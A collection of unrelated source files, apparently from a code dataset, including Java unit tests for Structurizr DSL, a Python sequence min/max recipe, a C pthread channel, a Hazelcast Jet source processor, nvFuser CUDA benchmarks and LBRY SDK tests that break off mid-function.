import com.structurizr.model.Enterprise;
import com.structurizr.model.Location;
import com.structurizr.model.Person;
import com.structurizr.model.SoftwareSystem;
import org.junit.jupiter.api.Test;
import static org.junit.jupiter.api.Assertions.assertEquals;
class ModelDslContextTests extends AbstractTests {
@Test
void end_DoesNothing_WhenNoPeopleAreMarkedAsInternal() {
ModelDslContext context = new ModelDslContext();
context.setWorkspace(workspace);
Person user1 = workspace.getModel().addPerson("Name 1");
Person user2 = workspace.getModel().addPerson("Name 2");
assertEquals(Location.Unspecified, user1.getLocation());
assertEquals(Location.Unspecified, user2.getLocation());
context.end();
assertEquals(Location.Unspecified, user1.getLocation());
assertEquals(Location.Unspecified, user2.getLocation());
}
@Test
void end_MarksAllOtherPeopleAsExternal_WhenSomePeopleAreMarkedAsInternal() {
ModelDslContext context = new ModelDslContext();
context.setWorkspace(workspace);
workspace.getModel().setEnterprise(new Enterprise("Name"));
Person user1 = workspace.getModel().addPerson("Name 1");
Person user2 = workspace.getModel().addPerson("Name 2");
user2.setLocation(Location.Internal);
assertEquals(Location.Unspecified, user1.getLocation());
assertEquals(Location.Internal, user2.getLocation());
context.end();
assertEquals(Location.External, user1.getLocation());
assertEquals(Location.Internal, user2.getLocation());
}
@Test
void end_DoesNothing_WhenNoSoftwareSystemsAreMarkedAsInternal() {
ModelDslContext context = new ModelDslContext();
context.setWorkspace(workspace);
SoftwareSystem softwareSystem1 = workspace.getModel().addSoftwareSystem("Name 1");
SoftwareSystem softwareSystem2 = workspace.getModel().addSoftwareSystem("Name 2");
assertEquals(Location.Unspecified, softwareSystem1.getLocation());
assertEquals(Location.Unspecified, softwareSystem2.getLocation());
context.end();
assertEquals(Location.Unspecified, softwareSystem1.getLocation());
assertEquals(Location.Unspecified, softwareSystem2.getLocation());
}
@Test
void end_MarksAllOtherSoftwareSystemsAsExternal_WhenSomeSoftwareSystemsAreMarkedAsInternal() {
ModelDslContext context = new ModelDslContext();
context.setWorkspace(workspace);
workspace.getModel().setEnterprise(new Enterprise("Name"));
SoftwareSystem softwareSystem1 = workspace.getModel().addSoftwareSystem("Name 1");
SoftwareSystem softwareSystem2 = workspace.getModel().addSoftwareSystem("Name 2");
softwareSystem1.setLocation(Location.Internal);
assertEquals(Location.Internal, softwareSystem1.getLocation());
assertEquals(Location.Unspecified, softwareSystem2.getLocation());
context.end();
assertEquals(Location.Internal, softwareSystem1.getLocation());
assertEquals(Location.External, softwareSystem2.getLocation());
}
} | 1,117 |
2,023 | <filename>recipes/Python/415233_Getting_minmax_sequence_greaterless_thsome/recipe-415233.py
def min_gt(seq, val):
"""
Return smallest item in seq for which item > val applies.
None is returned if seq was empty or all items in seq were <= val.
>>> min_gt([1, 3, 6, 7], 4)
6
>>> min_gt([2, 4, 7, 11], 5)
7
"""
for v in seq:
if v > val:
return v
return None
def min_ge(seq, val):
"""
Same as min_gt() except items equal to val are accepted as well.
>>> min_ge([1, 3, 6, 7], 6)
6
>>> min_ge([2, 3, 4, 8], 8)
8
"""
for v in seq:
if v >= val:
return v
return None
def max_lt(seq, val):
"""
Return greatest item in seq for which item < val applies.
None is returned if seq was empty or all items in seq were >= val.
>>> max_lt([3, 6, 7, 11], 10)
7
>>> max_lt((5, 9, 12, 13), 12)
9
"""
idx = len(seq)-1
while idx >= 0:
if seq[idx] < val:
return seq[idx]
idx -= 1
return None
def max_le(seq, val):
"""
Same as max_lt(), but items in seq equal to val apply as well.
>>> max_le([2, 3, 7, 11], 10)
7
>>> max_le((1, 3, 6, 11), 6)
6
"""
idx = len(seq)-1
while idx >= 0:
if seq[idx] <= val:
return seq[idx]
idx -= 1
return None
| 655 |
1,901 | #ifndef StrokeManager_h
#define StrokeManager_h
#import <UIKit/UIKit.h>
#import "RecognizedInk.h"
NS_ASSUME_NONNULL_BEGIN
/**
* Protocol used by the `StrokeManager` to send requests back to the `ViewController` to update the
* display.
*/
@protocol StrokeManagerDelegate <NSObject>
/** Clears any temporary ink managed by the caller. */
- (void)clearInk;
/** Redraws the ink and recognition results. */
- (void)redraw;
/** Display the given message to the user. */
- (void)displayMessage:(NSString *)message;
@end
/**
* The `StrokeManager` object is responsible for storing the ink and recognition results, and
* managing the interaction with the recognizer. It receives the touch points as the user is drawing
* from the `ViewController` (which takes care of rendering the ink), and stores them into an array
* of `Stroke`s. When the user taps "recognize", the strokes are collected together into an `Ink`
* object, and passed to the recognizer. The `StrokeManagerDelegate` protocol is used to inform the
* `ViewController` when the display needs to be updated.
*
* The `StrokeManager` provides additional methods to handle other buttons in the UI, including
* selecting a recognition language, downloading or deleting the recognition model, or clearing the
* ink.
*/
@interface StrokeManager : NSObject
/**
* Array of `RecognizedInk`s that have been sent to the recognizer along with any recognition
* results.
*/
@property(readonly, nonatomic) NSArray<RecognizedInk *> *recognizedInks;
/**
* Initializes internal state and stores a pointer to the view to allow for redrawing when ink is
* sent to the recognizer or recognition results come back.
*/
- (nullable instancetype)initWithDelegate:(nullable id<StrokeManagerDelegate>)delegate
NS_DESIGNATED_INITIALIZER;
- (nullable instancetype)init NS_UNAVAILABLE;
/** Function called by the `ViewController` to create the first point of a stroke. */
- (void)startStrokeAtPoint:(CGPoint)point time:(NSTimeInterval)t;
/** Function called by the `ViewController` to add a point to a stroke. */
- (void)continueStrokeAtPoint:(CGPoint)point time:(NSTimeInterval)t;
/** Function called by the `ViewController` to end a stroke. */
- (void)endStrokeAtPoint:(CGPoint)point time:(NSTimeInterval)t;
/** Clears all ink. */
- (void)clear;
/** Informs the `StrokeManager` of which recognizer to use for subsequent recognitions. */
- (void)selectLanguage:(NSString *)languageTag;
/**
* Asks the `StrokeManager` to start downloading the recognition model indicated by
* `selectLanguage:`.
*/
- (void)downloadModel;
/**
* Check whether the model for the given language tag is already downloaded.
*/
- (BOOL)isLanguageDownloaded:(NSString *)languageTag;
/** Asks the `StrokeManager` to delete the reocngition model indicated by `selectLanguage:`. */
- (void)deleteModel;
/**
* Asks the `StrokeManager` to recognize the unrecognized ink using the recognition model indicated
* by `selectLanguage:`.
*/
- (void)recognizeInk;
@end
#endif /* StrokeManager_h */
NS_ASSUME_NONNULL_END
| 900 |
118,175 | /*
* Copyright (c) Facebook, Inc. and its affiliates.
*
* This source code is licensed under the MIT license found in the
* LICENSE file in the root directory of this source tree.
*/
package com.facebook.react.uimanager.events;
/**
* An interface that can be implemented by a {@link com.facebook.react.bridge.ReactContext} to
* provide a first-class API for accessing the {@link EventDispatcher} from the {@link
* com.facebook.react.bridge.UIManager}.
*/
public interface EventDispatcherProvider {
/**
* This method should always return an EventDispatcher, even if the instance doesn't exist; in
* that case it should return the empty {@link BlackHoleEventDispatcher}.
*
* @return An {@link EventDispatcher} to emit events to JS.
*/
EventDispatcher getEventDispatcher();
}
| 234 |
2,098 | #define MR_CHAN_C_
#include <pthread.h>
#include <sys/time.h>
#include <stdlib.h>
#include <errno.h>
#include <stdio.h>
#include <assert.h>
void *MRCHANNEL_CLOSED = (void *)"MRCHANNEL_CLOSED";
typedef struct chanItem {
void *ptr;
struct chanItem *next;
} chanItem;
typedef struct MRChannel {
chanItem *head;
chanItem *tail;
size_t size;
size_t maxSize;
volatile int open;
pthread_mutex_t lock;
pthread_cond_t cond;
// condition used to wait for closing
pthread_cond_t closeCond;
} MRChannel;
#include "chan.h"
MRChannel *MR_NewChannel(size_t max) {
MRChannel *chan = malloc(sizeof(*chan));
*chan = (MRChannel){
.head = NULL,
.tail = NULL,
.size = 0,
.maxSize = max,
.open = 1,
};
pthread_cond_init(&chan->cond, NULL);
pthread_cond_init(&chan->closeCond, NULL);
pthread_mutex_init(&chan->lock, NULL);
return chan;
}
/* Safely wait until the channel is closed */
void MRChannel_WaitClose(MRChannel *chan) {
pthread_mutex_lock(&chan->lock);
while (chan->open) {
pthread_cond_wait(&chan->closeCond, &chan->lock);
}
pthread_mutex_unlock(&chan->lock);
}
void MRChannel_Free(MRChannel *chan) {
// TODO: proper drain and stop routine
pthread_mutex_destroy(&chan->lock);
pthread_cond_destroy(&chan->cond);
free(chan);
}
size_t MRChannel_Size(MRChannel *chan) {
pthread_mutex_lock(&chan->lock);
size_t ret = chan->size;
pthread_mutex_unlock(&chan->lock);
return ret;
}
size_t MRChannel_MaxSize(MRChannel *chan) {
pthread_mutex_lock(&chan->lock);
size_t ret = chan->maxSize;
pthread_mutex_unlock(&chan->lock);
return ret;
}
int MRChannel_Push(MRChannel *chan, void *ptr) {
pthread_mutex_lock(&chan->lock);
int rc = 1;
if (!chan->open || (chan->maxSize > 0 && chan->size == chan->maxSize)) {
rc = 0;
goto end;
}
chanItem *item = malloc(sizeof(*item));
item->next = NULL;
item->ptr = ptr;
if (chan->tail) {
// make it the next of the current tail
chan->tail->next = item;
// set a new tail
chan->tail = item;
} else { // no tail means no head - empty queue
chan->head = chan->tail = item;
}
chan->size++;
end:
if (pthread_cond_broadcast(&chan->cond)) rc = 0;
pthread_mutex_unlock(&chan->lock);
return rc;
}
void *MRChannel_ForcePop(MRChannel *chan) {
pthread_mutex_lock(&chan->lock);
chanItem *item = chan->head;
if(!item){
pthread_mutex_unlock(&chan->lock);
return NULL;
}
chan->head = item->next;
// empty queue...
if (!chan->head) chan->tail = NULL;
chan->size--;
pthread_mutex_unlock(&chan->lock);
// discard the item (TODO: recycle items)
void* ret = item->ptr;
free(item);
return ret;
}
// todo wait is not actually used anywhere...
void *MRChannel_Pop(MRChannel *chan) {
void *ret = NULL;
pthread_mutex_lock(&chan->lock);
while (!chan->size) {
if (!chan->open) {
pthread_mutex_unlock(&chan->lock);
return MRCHANNEL_CLOSED;
}
int rc = pthread_cond_wait(&chan->cond, &chan->lock);
assert(rc == 0 && "cond_wait failed");
if (!chan->size) {
// otherwise, spurious wakeup
printf("spurious cond_wait wakeup\n");
// continue..
}
}
chanItem *item = chan->head;
assert(item);
chan->head = item->next;
// empty queue...
if (!chan->head) chan->tail = NULL;
chan->size--;
pthread_mutex_unlock(&chan->lock);
// discard the item (TODO: recycle items)
ret = item->ptr;
free(item);
return ret;
}
void MRChannel_Close(MRChannel *chan) {
pthread_mutex_lock(&chan->lock);
chan->open = 0;
// notify any waiting readers
pthread_cond_broadcast(&chan->cond);
pthread_cond_broadcast(&chan->closeCond);
pthread_mutex_unlock(&chan->lock);
}
| 1,488 |
4,283 | /*
* Copyright (c) 2008-2021, Hazelcast, Inc. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.hazelcast.jet.impl.connector;
import com.hazelcast.core.ManagedContext;
import com.hazelcast.function.BiConsumerEx;
import com.hazelcast.function.FunctionEx;
import com.hazelcast.jet.Traverser;
import com.hazelcast.jet.core.AbstractProcessor;
import com.hazelcast.jet.core.BroadcastKey;
import com.hazelcast.jet.core.EventTimeMapper;
import com.hazelcast.jet.core.EventTimePolicy;
import com.hazelcast.jet.core.processor.SourceProcessors;
import com.hazelcast.jet.impl.JetEvent;
import com.hazelcast.security.PermissionsUtil;
import javax.annotation.Nonnull;
import javax.annotation.Nullable;
import java.util.ArrayList;
import java.util.List;
import java.util.function.BiConsumer;
import java.util.function.Consumer;
import java.util.function.Function;
import static com.hazelcast.jet.core.BroadcastKey.broadcastKey;
/**
* Implements a data source the user created using the Source Builder API.
*
* @see SourceProcessors#convenientSourceP
* @see SourceProcessors#convenientTimestampedSourceP
*/
public class ConvenientSourceP<C, T, S> extends AbstractProcessor {
/**
* This processor's view of the buffer accessible to the user. Abstracts
* away the difference between the plain and the timestamped buffer.
*/
public interface SourceBufferConsumerSide<T> {
/**
* Returns a traverser over the contents of the buffer. Traversing the
* items automatically removes them from the buffer.
*/
Traverser<T> traverse();
boolean isEmpty();
boolean isClosed();
}
private final Function<? super Context, ? extends C> createFn;
private final BiConsumer<? super C, ? super SourceBufferConsumerSide<?>> fillBufferFn;
private final FunctionEx<? super C, ? extends S> createSnapshotFn;
private final BiConsumerEx<? super C, ? super List<S>> restoreSnapshotFn;
private final Consumer<? super C> destroyFn;
private final SourceBufferConsumerSide<?> buffer;
private final EventTimeMapper<T> eventTimeMapper;
private BroadcastKey<Integer> snapshotKey;
private boolean initialized;
private C ctx;
private Traverser<?> traverser;
private S pendingState;
private List<S> restoredStates;
public ConvenientSourceP(
@Nonnull Function<? super Context, ? extends C> createFn,
@Nonnull BiConsumer<? super C, ? super SourceBufferConsumerSide<?>> fillBufferFn,
@Nonnull FunctionEx<? super C, ? extends S> createSnapshotFn,
@Nonnull BiConsumerEx<? super C, ? super List<S>> restoreSnapshotFn,
@Nonnull Consumer<? super C> destroyFn,
@Nonnull SourceBufferConsumerSide<?> buffer,
@Nullable EventTimePolicy<? super T> eventTimePolicy
) {
this.createFn = createFn;
this.fillBufferFn = fillBufferFn;
this.createSnapshotFn = createSnapshotFn;
this.restoreSnapshotFn = restoreSnapshotFn;
this.destroyFn = destroyFn;
this.buffer = buffer;
if (eventTimePolicy != null) {
eventTimeMapper = new EventTimeMapper<>(eventTimePolicy);
eventTimeMapper.addPartitions(1);
} else {
eventTimeMapper = null;
}
}
@Override
public boolean isCooperative() {
return false;
}
@Override
protected void init(@Nonnull Context context) {
PermissionsUtil.checkPermission(createSnapshotFn, context);
// createFn is allowed to return null, we'll call `destroyFn` even for null `ctx`
ManagedContext managedContext = context.managedContext();
ctx = (C) managedContext.initialize(createFn.apply(context));
snapshotKey = broadcastKey(context.globalProcessorIndex());
initialized = true;
}
@Override
public boolean complete() {
if (traverser == null) {
fillBufferFn.accept(ctx, buffer);
traverser =
eventTimeMapper == null ? buffer.traverse()
: buffer.isEmpty() ? eventTimeMapper.flatMapIdle()
: buffer.traverse().flatMap(t -> {
// if eventTimeMapper is not null, we know that T is JetEvent<T>
@SuppressWarnings("unchecked")
JetEvent<T> je = (JetEvent<T>) t;
return eventTimeMapper.flatMapEvent(je.payload(), 0, je.timestamp());
});
}
boolean bufferEmitted = emitFromTraverser(traverser);
if (bufferEmitted) {
traverser = null;
}
return bufferEmitted && buffer.isClosed();
}
@Override
public boolean saveToSnapshot() {
// finish current traverser
if (traverser != null && !emitFromTraverser(traverser)) {
return false;
}
if (buffer.isClosed()) {
// don't call createSnapshotFn after the buffer is closed
return true;
}
traverser = null;
if (pendingState == null) {
pendingState = createSnapshotFn.apply(ctx);
}
if (pendingState == null || tryEmitToSnapshot(snapshotKey, pendingState)) {
pendingState = null;
return true;
}
return false;
}
@Override
@SuppressWarnings("unchecked")
protected void restoreFromSnapshot(@Nonnull Object key, @Nonnull Object value) {
if (restoredStates == null) {
restoredStates = new ArrayList<>();
}
restoredStates.add((S) value);
}
@Override
public boolean finishSnapshotRestore() {
if (restoredStates != null) {
restoreSnapshotFn.accept(ctx, restoredStates);
}
restoredStates = null;
return true;
}
@Override
public void close() {
if (initialized) {
destroyFn.accept(ctx);
}
}
}
| 2,555 |
367 | from enum import Enum
from typing import Dict, Any
from jwt.algorithms import get_default_algorithms
from cryptography.hazmat._types import (
_PRIVATE_KEY_TYPES,
_PUBLIC_KEY_TYPES,
)
# custom types
PrivateKey = _PRIVATE_KEY_TYPES
PublicKey = _PUBLIC_KEY_TYPES
JWTClaims = Dict[str, Any]
class EncryptionKeyFormat(str, Enum):
"""
represent the supported formats for storing encryption keys.
- PEM (https://en.wikipedia.org/wiki/Privacy-Enhanced_Mail)
- SSH (RFC4716) or short format (RFC4253, section-6.6, explained here: https://coolaj86.com/articles/the-ssh-public-key-format/)
- DER (https://en.wikipedia.org/wiki/X.690#DER_encoding)
"""
pem = 'pem'
ssh = 'ssh'
der = 'der'
# dynamic enum because pyjwt does not define one
# see: https://pyjwt.readthedocs.io/en/stable/algorithms.html for possible values
JWTAlgorithm = Enum('JWTAlgorithm', [(k,k) for k in get_default_algorithms().keys()]) | 357 |
60,067 | #include <torch/csrc/jit/codegen/cuda/arith.h>
#include <torch/csrc/jit/codegen/cuda/executor.h>
#include <torch/csrc/jit/codegen/cuda/fusion.h>
#include <torch/csrc/jit/codegen/cuda/lower2device.h>
#include <torch/csrc/jit/codegen/cuda/scheduler/all_schedulers.h>
#include <benchmark/benchmark.h>
#include <cuda_runtime.h>
#include "utils.h"
using namespace torch::jit::fuser::cuda;
static void setupSBR(Fusion* fusion, DataType dtype) {
TORCH_INTERNAL_ASSERT(dtype == DataType::Float || dtype == DataType::Half);
FusionGuard fg(fusion);
const size_t kNumberOfDims = 4;
std::vector<int64_t> bcast_shape(kNumberOfDims, 1);
bcast_shape[bcast_shape.size() - 1] = -1;
std::vector<bool> bcast_contig(kNumberOfDims, false);
bcast_contig[bcast_contig.size() - 1] = true;
auto x = makeContigTensor(kNumberOfDims, dtype);
auto scale = TensorViewBuilder()
.contiguity(bcast_contig)
.shape(bcast_shape)
.dtype(dtype)
.build();
auto bias = TensorViewBuilder()
.contiguity(bcast_contig)
.shape(bcast_shape)
.dtype(dtype)
.build();
fusion->addInput(x);
fusion->addInput(scale);
fusion->addInput(bias);
if (dtype == DataType::Half) {
x = castOp(DataType::Float, x);
scale = castOp(DataType::Float, scale);
bias = castOp(DataType::Float, bias);
}
auto scale_bias = add(mul(x, scale), bias);
auto scale_bias_relu = unaryOp(UnaryOpType::Relu, scale_bias);
if (dtype == DataType::Half) {
scale_bias_relu = castOp(DataType::Half, scale_bias_relu);
}
fusion->addOutput(scale_bias_relu);
}
static void setupSBRNorm(Fusion* fusion, DataType dtype) {
TORCH_INTERNAL_ASSERT(dtype == DataType::Float || dtype == DataType::Half);
FusionGuard fg(fusion);
const size_t kNumberOfDims = 4;
auto x = makeContigTensor(kNumberOfDims, dtype);
auto weight = makeContigTensor(1, dtype);
auto bias = makeContigTensor(1, dtype);
auto mean = makeContigTensor(1, dtype);
auto var = makeContigTensor(1, dtype);
fusion->addInput(x);
fusion->addInput(weight);
fusion->addInput(bias);
fusion->addInput(mean);
fusion->addInput(var);
std::vector<bool> broadcast_mask(kNumberOfDims, true);
broadcast_mask[broadcast_mask.size() - 1] = false;
if (dtype == DataType::Half) {
x = castOp(DataType::Float, x);
weight = castOp(DataType::Float, weight);
bias = castOp(DataType::Float, bias);
mean = castOp(DataType::Float, mean);
var = castOp(DataType::Float, var);
}
auto rsqrt = unaryOp(UnaryOpType::Rsqrt, var);
auto this_scale = mul(weight, rsqrt);
auto this_bias = mul(sub(bias, mean), this_scale);
auto bcast_scale = broadcast(this_scale, broadcast_mask);
auto bcast_bias = broadcast(this_bias, broadcast_mask);
auto scale_bias = add(mul(x, bcast_scale), bcast_bias);
auto scale_bias_relu = unaryOp(UnaryOpType::Relu, scale_bias);
if (dtype == DataType::Half) {
scale_bias_relu = castOp(DataType::Half, scale_bias_relu);
}
fusion->addOutput(scale_bias_relu);
}
//------------------------------------------------------------------------------
static void NvFuserScheduler_SBR(
benchmark::State& benchmark_state,
FusionExecutorCache* fusion_executor_cache,
DataType dtype) {
// N, H, W, C format
std::vector<int64_t> input_shape{
benchmark_state.range(0),
benchmark_state.range(1),
benchmark_state.range(1),
benchmark_state.range(2)};
std::vector<int64_t> bcast_shape{1, 1, 1, -1};
// inputs
at::manual_seed(0);
std::vector<int64_t> static_bcast_shape{1, 1, 1, benchmark_state.range(2)};
auto options =
at::TensorOptions().dtype(data_type_to_aten(dtype)).device(at::kCUDA, 0);
at::Tensor at_x = at::randn(input_shape, options);
at::Tensor at_scale = at::ones(static_bcast_shape, options);
at::Tensor at_bias = at::zeros(static_bcast_shape, options);
// inputs
std::vector<c10::IValue> aten_inputs = {at_x, at_scale, at_bias};
fusion_executor_cache->profile(true);
fusion_executor_cache->runFusionWithInputs(aten_inputs);
auto compile_log = fusion_executor_cache->getMostRecentExecutorInfo();
auto executor_instance = compile_log.fusion_executor;
TORCH_INTERNAL_ASSERT(compile_log.pointwise_params.has_value());
TORCH_INTERNAL_ASSERT(compile_log.launch_constraints.has_value());
auto params = toString(compile_log.pointwise_params.value());
auto lparams = toString(compile_log.launch_constraints.value());
benchmark_state.SetLabel(params + lparams);
benchmark_state.SetLabel(lparams);
fusion_executor_cache->profile(false);
executor_instance->setMeasureKernelTimeFlag(true);
// Sync everything up before we start
cudaDeviceSynchronize();
for (auto _ : benchmark_state) {
auto cg_outputs = fusion_executor_cache->runFusionWithInputs(aten_inputs);
benchmark_state.SetIterationTime(
executor_instance->kernelTimeMs() / 1000.0);
clearL2Cache();
}
// Sync everything up before we're finished, don't want to run ahead on the
// cpu while benchmarking.
cudaDeviceSynchronize();
const size_t size =
input_shape[0] * input_shape[1] * input_shape[2] * input_shape[3];
const size_t channels = input_shape[3];
benchmark_state.SetBytesProcessed(
int64_t(benchmark_state.iterations()) * (channels * 2 + size * 2) *
int64_t(dataTypeSize(dtype)));
}
static void Baseline_SBR(benchmark::State& benchmark_state, DataType dtype) {
// N, H, W, C format
std::vector<int64_t> input_shape{
benchmark_state.range(0),
benchmark_state.range(1),
benchmark_state.range(1),
benchmark_state.range(2)};
std::vector<int64_t> bcast_shape{benchmark_state.range(2)};
// inputs
at::manual_seed(0);
auto options =
at::TensorOptions().dtype(data_type_to_aten(dtype)).device(at::kCUDA, 0);
at::Tensor at_x = at::randn(input_shape, options);
at::Tensor at_y = at::randn(input_shape, options);
at::Tensor at_scale = at::ones(bcast_shape, options);
at::Tensor at_bias = at::zeros(bcast_shape, options);
cudaDeviceSynchronize();
for (auto _ : benchmark_state) {
CudaKernelTimer timer;
auto scale = at::mul(at_x, at_scale);
auto bias = at::add(scale, at_bias);
auto output = at::relu(bias);
benchmark_state.SetIterationTime(timer.elapsed() / 1000.0);
cudaDeviceSynchronize();
clearL2Cache();
cudaDeviceSynchronize();
}
const size_t size =
input_shape[0] * input_shape[1] * input_shape[2] * input_shape[3];
const size_t channels = input_shape[3];
benchmark_state.SetBytesProcessed(
int64_t(benchmark_state.iterations()) * (channels * 2 + size * 2) *
int64_t(dataTypeSize(dtype)));
}
//------------------------------------------------------------------------------
static void NvFuserScheduler_SBR_Norm(
benchmark::State& benchmark_state,
FusionExecutorCache* fusion_executor_cache,
DataType dtype) {
// N, H, W, C format
std::vector<int64_t> input_shape{
benchmark_state.range(0),
benchmark_state.range(1),
benchmark_state.range(1),
benchmark_state.range(2)};
std::vector<int64_t> bcast_shape{benchmark_state.range(2)};
// inputs
at::manual_seed(0);
auto options =
at::TensorOptions().dtype(data_type_to_aten(dtype)).device(at::kCUDA, 0);
at::Tensor at_x = at::randn(input_shape, options);
at::Tensor at_weight = at::ones(bcast_shape, options);
at::Tensor at_bias = at::zeros(bcast_shape, options);
at::Tensor at_mean = at::zeros(bcast_shape, options);
at::Tensor at_var = at::ones(bcast_shape, options);
// inputs
std::vector<c10::IValue> aten_inputs = {
at_x, at_weight, at_bias, at_mean, at_var};
fusion_executor_cache->profile(true);
fusion_executor_cache->runFusionWithInputs(aten_inputs);
auto compile_log = fusion_executor_cache->getMostRecentExecutorInfo();
auto executor_instance = compile_log.fusion_executor;
TORCH_INTERNAL_ASSERT(compile_log.pointwise_params.has_value());
TORCH_INTERNAL_ASSERT(compile_log.launch_constraints.has_value());
auto params = toString(compile_log.pointwise_params.value());
auto lparams = toString(compile_log.launch_constraints.value());
benchmark_state.SetLabel(params + lparams);
fusion_executor_cache->profile(false);
executor_instance->setMeasureKernelTimeFlag(true);
// Sync everything up before we start
cudaDeviceSynchronize();
for (auto _ : benchmark_state) {
auto cg_outputs = fusion_executor_cache->runFusionWithInputs(aten_inputs);
benchmark_state.SetIterationTime(
executor_instance->kernelTimeMs() / 1000.0);
clearL2Cache();
}
// Sync everything up before we're finished, don't want to run ahead on the
// cpu while benchmarking.
cudaDeviceSynchronize();
const size_t size =
input_shape[0] * input_shape[1] * input_shape[2] * input_shape[3];
const size_t channels = input_shape[3];
benchmark_state.SetBytesProcessed(
int64_t(benchmark_state.iterations()) * (channels * 4 + size * 2) *
int64_t(dataTypeSize(dtype)));
}
static void Baseline_SBR_Norm(
benchmark::State& benchmark_state,
DataType dtype) {
// N, H, W, C format
std::vector<int64_t> input_shape{
benchmark_state.range(0),
benchmark_state.range(1),
benchmark_state.range(1),
benchmark_state.range(2)};
std::vector<int64_t> bcast_shape{1, 1, 1, benchmark_state.range(2)};
// inputs
at::manual_seed(0);
auto options =
at::TensorOptions().dtype(data_type_to_aten(dtype)).device(at::kCUDA, 0);
at::Tensor at_x = at::randn(input_shape, options);
at::Tensor at_weight = at::ones(bcast_shape, options);
at::Tensor at_bias = at::zeros(bcast_shape, options);
at::Tensor at_mean = at::zeros(bcast_shape, options);
at::Tensor at_var = at::ones(bcast_shape, options);
cudaDeviceSynchronize();
for (auto _ : benchmark_state) {
CudaKernelTimer timer;
auto this_scale = at::mul(at_weight, at::rsqrt(at_var));
auto this_bias = at::mul(at::sub(at_bias, at_mean), this_scale);
auto scale = at::mul(at_x, this_scale);
auto bias = at::add(scale, this_bias);
auto output = at::relu(bias);
benchmark_state.SetIterationTime(timer.elapsed() / 1000.0);
cudaDeviceSynchronize();
}
const size_t size =
input_shape[0] * input_shape[1] * input_shape[2] * input_shape[3];
const size_t channels = input_shape[3];
benchmark_state.SetBytesProcessed(
int64_t(benchmark_state.iterations()) * (channels * 4 + size * 2) *
int64_t(dataTypeSize(dtype)));
}
//------------------------------------------------------------------------------
NVFUSER_BENCHMARK_DEFINE(
NvFuserScheduler_SBR_fp32,
setupSBR,
NvFuserScheduler_SBR,
DataType::Float);
NVFUSER_BENCHMARK_RUN(NvFuserScheduler_SBR_fp32)
->RangeMultiplier(2)
->Ranges({{8, 8}, {640, 640}, {64, 256}})
->Unit(benchmark::kMicrosecond)
->UseManualTime();
NVFUSER_BENCHMARK_DEFINE(
NvFuserScheduler_SBR_fp16,
setupSBR,
NvFuserScheduler_SBR,
DataType::Half);
NVFUSER_BENCHMARK_RUN(NvFuserScheduler_SBR_fp16)
->RangeMultiplier(2)
->Ranges({{8, 8}, {640, 640}, {64, 256}})
->Unit(benchmark::kMicrosecond)
->UseManualTime();
//------------------------------------------------------------------------------
NVFUSER_BENCHMARK_DEFINE(
NvFuserScheduler_SBR_Norm_fp32,
setupSBRNorm,
NvFuserScheduler_SBR_Norm,
DataType::Float);
NVFUSER_BENCHMARK_RUN(NvFuserScheduler_SBR_Norm_fp32)
->RangeMultiplier(2)
->Ranges({{8, 8}, {640, 640}, {64, 256}})
->Unit(benchmark::kMicrosecond)
->UseManualTime();
NVFUSER_BENCHMARK_DEFINE(
NvFuserScheduler_SBR_Norm_fp16,
setupSBRNorm,
NvFuserScheduler_SBR_Norm,
DataType::Half);
NVFUSER_BENCHMARK_RUN(NvFuserScheduler_SBR_Norm_fp16)
->RangeMultiplier(2)
->Ranges({{8, 8}, {640, 640}, {64, 256}})
->Unit(benchmark::kMicrosecond)
->UseManualTime();
//------------------------------------------------------------------------------
static void Baseline_SBR_fp32(benchmark::State& benchmark_state) {
Baseline_SBR(benchmark_state, DataType::Float);
}
BENCHMARK(Baseline_SBR_fp32)
->RangeMultiplier(2)
->Ranges({{8, 8}, {640, 640}, {64, 256}})
->Unit(benchmark::kMicrosecond)
->UseManualTime();
static void Baseline_SBR_fp16(benchmark::State& benchmark_state) {
Baseline_SBR(benchmark_state, DataType::Half);
}
BENCHMARK(Baseline_SBR_fp16)
->RangeMultiplier(2)
->Ranges({{8, 8}, {640, 640}, {64, 256}})
->Unit(benchmark::kMicrosecond)
->UseManualTime();
//------------------------------------------------------------------------------
static void Baseline_SBR_Norm_fp32(benchmark::State& benchmark_state) {
Baseline_SBR_Norm(benchmark_state, DataType::Float);
}
BENCHMARK(Baseline_SBR_Norm_fp32)
->RangeMultiplier(2)
->Ranges({{8, 8}, {640, 640}, {64, 256}})
->Unit(benchmark::kMicrosecond)
->UseManualTime();
static void Baseline_SBR_Norm_fp16(benchmark::State& benchmark_state) {
Baseline_SBR_Norm(benchmark_state, DataType::Half);
}
BENCHMARK(Baseline_SBR_Norm_fp16)
->RangeMultiplier(2)
->Ranges({{8, 8}, {640, 640}, {64, 256}})
->Unit(benchmark::kMicrosecond)
->UseManualTime();
| 5,317 |
4,996 | <reponame>nishp77/lbry-sdk
from lbry.testcase import CommandTestCase
class AddressManagement(CommandTestCase):
async def test_address_list(self):
addresses = await self.out(self.daemon.jsonrpc_address_list())
self.assertItemCount(addresses, 27)
single = await self.out(self.daemon.jsonrpc_address_list(addresses['items'][11]['address']))
self.assertItemCount(single, 1)
self.assertEqual(single['items'][0], addresses['items'][11])
class SettingsManagement(CommandTestCase):
async def test_settings(self):
self.assertEqual(self.daemon.jsonrpc_settings_get()['lbryum_servers'][0], ('localhost', 50002))
setting = self.daemon.jsonrpc_settings_set('lbryum_servers', ['server:50001'])
self.assertEqual(setting['lbryum_servers'][0], ('server', 50001))
self.assertEqual(self.daemon.jsonrpc_settings_get()['lbryum_servers'][0], ('server', 50001))
setting = self.daemon.jsonrpc_settings_clear('lbryum_servers')
self.assertEqual(setting['lbryum_servers'][0], ('spv11.lbry.com', 50001))
self.assertEqual(self.daemon.jsonrpc_settings_get()['lbryum_servers'][0], ('spv11.lbry.com', 50001))
# test_privacy_settings (merged for reducing test time, unmerge when its fast)
# tests that changing share_usage_data propagates to the relevant properties
self.assertFalse(self.daemon.jsonrpc_settings_get()['share_usage_data'])
self.daemon.jsonrpc_settings_set('share_usage_data', True)
self.assertTrue(self.daemon.jsonrpc_settings_get()['share_usage_data'])
self.assertTrue(self.daemon.analytics_manager.enabled)
self.daemon.jsonrpc_settings_set('share_usage_data', False)
class TroubleshootingCommands(CommandTestCase):
async def test_tracemalloc_commands(self):
